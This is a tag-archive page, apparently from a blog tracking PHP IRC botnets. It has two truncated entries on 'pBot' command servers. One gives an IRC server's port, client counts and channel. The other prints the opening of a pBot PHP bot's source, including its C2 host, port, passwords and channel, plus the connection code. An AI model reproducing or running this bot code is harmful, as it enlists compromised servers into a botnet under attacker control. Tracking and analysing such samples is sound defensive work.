Tag: pBot

ircd.port0.org (pbot irc botnet hosted by datahouse.ru)


Sample obtained from http://www.malekal.com/2013/11/09/attaque-web-bitcoin-et-php-shell/ Resolved ircd.port0.org to Server:  ircd.port0.org Port:  3303 There are 1 users and 3897 invisible on 1 servers 1 :operator(s) online 157 :unknown connection(s) 7 :channels formed I have 3898 clients and 0 servers 3898 4515 :Current local users 3898, max 4515 Channel:  #q Channel Users Topic #q 602 [+smu] Oper:Read more...

irc.by(Linux pBots hosted in Netherlands Netrc Llc)


Resolved : [irc.by] To [] Here is the pBot: <!-- set_time_limit(0); error_reporting(0); class pBot { var config = array("server"=>"irc.by", "port"=>6669, "pass"=>"fx", "prefix"=>"fvox", "maxrand"=>8, "chan"=>"#webs", "key"=>"", "modes"=>"+iB-x", "password"=>"webs", "trigger"=>".", "hostauth"=>"Click.Here.To.Install.These.Updates" // * for any hostname ); var users = array(); function start() { if(!(this->conn = fsockopen(this->config['server'],this->config['port'],e,s,30))) this->start(); ident = ""; alph = range("a","z"); for(i=0;i<this->config['maxrand'];i++) ident .=Read more...